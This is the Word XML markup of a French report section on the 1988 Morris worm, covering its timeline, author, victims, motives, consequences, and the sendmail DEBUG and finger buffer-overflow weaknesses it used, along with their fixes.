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22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="439B6624" w14:textId="28A8995B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partie 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7DAFB8FA" w14:textId="00B40EC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le Vers Morris </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1988</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="51BF0896" w14:textId="28B93CEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Le déroulé des événements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="286FB273" w14:textId="3136099F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2 novembre 1988, 20h30</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Robert Tappan Morris lance le ver depuis le MIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="601D9DAC" w14:textId="23EE30F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>En quelques heures</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: 6 000 machines infectées (10% des ~60 000 ordinateurs connectés à Internet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="6B36BCA7" w14:textId="33F5CEC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problème principal</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Une erreur de code fait que le ver réinfecte les mêmes machines plusieurs fois, les paralysant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7DE16202" w14:textId="23E46EFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durée</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Quelques jours à une semaine pour nettoyer les systèmes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="75A57DD4" w14:textId="65AD8B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riposte</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: En 48h, Berkeley et MIT trouvent des correctifs et les diffusent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="7A813EE6" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="000E22A9" w:rsidP="00F5792E" w:rsidRDefault="000E22A9" w14:paraId="68D93688" w14:textId="30063DE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5792E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Les acteurs impliqués</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="700DFDCF" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Robert Tappan Morris (créateur)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="63CED872" w14:textId="51C15887">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>23 ans, étudiant diplômé à l</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Université Cornell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="11527D23" w14:textId="2978FCA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Fils de Robert Morris, cryptographe à la NSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="24975486" w14:textId="7794B8E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Lancé depuis le MIT pour éviter de tracer l</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>attaque vers Cornell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="5C9263FB" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victimes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="77128313" w14:textId="227136DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Universités : Harvard, Stanford, UC Berkeley, MIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="1C3B6983" w14:textId="1DC04876">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Agences gouvernementales et militaires</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="485A2162" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>NASA, Lawrence Livermore National Laboratory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="2536FA91" w14:textId="7E1A0C63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Organismes privés</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="49375C2D" w14:textId="1F85E85C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Les auteurs et leurs motivations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="6BD7F978" w14:textId="5E46A5DB">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective initial</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Mesurer la taille du réseau Internet en comptabilisant les machines infectées</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="578A699A" w14:textId="0A5DC6BB">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intention</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Expérience académique non-destructive pour démontrer les failles de sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="74022045" w14:textId="62AA428E">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ce qui s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>est mal passé</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve">: Erreur de code </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> le ver continue à se répliquer indépendamment de son statut d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>infection, créant une avalanche de copies qui paralyse les systèmes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="109CE36A" w14:textId="11CA3908">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Action de Morris</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: En voyant l</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>ampleur, il a tenté de prévenir discrètement les journalistes que c</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>était une erreur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="6DCD2628" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Les conséquences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="723DC5C3" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Financières</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="46D8C625" w14:textId="49223C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Estimation</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: entre 100 000 $ et 10 millions de dollars</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="05366079" w14:textId="02BBFE40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Coûts par machine</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: 200 $ à 53 000 $ pour l</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>élimination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="121FAC12" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technologiques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="6418E529" w14:textId="02C4F30F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve">Création du CERT (Computer Emergency Response Team) </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> première équipe d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>urgence informatique</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="2A1C3FB2" w14:textId="1028C229">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Développement des pare-feu commerciaux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="18C4556D" w14:textId="0854CD9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Création de logiciels de détection d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>intrusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3F0DEE32" w14:textId="6D5F3649">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Patching rapide de sendmail et finger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="1477C577" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Historiques/Politiques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="51DF1CC7" w14:textId="0ED6A6D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Première condamnation</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> sous le Computer Fraud and Abuse Act (1986)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="775FE11F" w14:textId="5FCF70F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Morris condamné à</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: 10 050 $ d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>amende + 3 ans probation + 400h travaux d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>intérêt général</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="344C5281" w14:textId="2570E28C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Marquant le changement</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: fin de l</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>innocence d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Internet, naissance de la conscience sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="6F05FC99" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact durable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="53B85C56" w14:textId="2116380F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Shift paradigmatique</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve">: la sécurité informatique passe de </w:t>
      </w:r>
      <w:r>
        <w:t>« </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>facultatif</w:t>
      </w:r>
      <w:r>
        <w:t> »</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> à </w:t>
      </w:r>
      <w:r>
        <w:t>« </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>essentiel</w:t>
      </w:r>
      <w:r>
        <w:t> »</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7E0EE368" w14:textId="528AA9CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Création d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>institutions (CERT, CIAC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="4379C167" w14:textId="1C370B90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Sensibilisation massive à la cybersécurité</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="30FD589F" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Les vulnérabilités exploitées</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="023D9B31" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Sendmail (mode DEBUG)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3991DE5D" w14:textId="387B6FDF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Mode de débogage permettait d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>envoyer du code compilable à distance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="53ACC73F" w14:textId="211738B8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Pas d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>authentification requise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7640526C" w14:textId="5C43EF5B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Correction</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: désactiver le mode DEBUG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="1CA6FF6F" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Finger (débordement de tampon)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="01602B13" w14:textId="215B3715">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Service permettait de consulter les utilisateurs connectés</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="75C7D0D1" w14:textId="4BB53F97">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Débordement</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: envoyer 536 caractères au lieu de 512 → écraser la pile système</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="05692B70" w14:textId="1747F4EC">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Le vers prend contrôle et envoie sa copie aux autres machines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="2E91A0DC" w14:textId="7BB655D1">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Correction</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: modifier la vérification des limites de buffer</w:t>
      </w:r>
    </w:p>
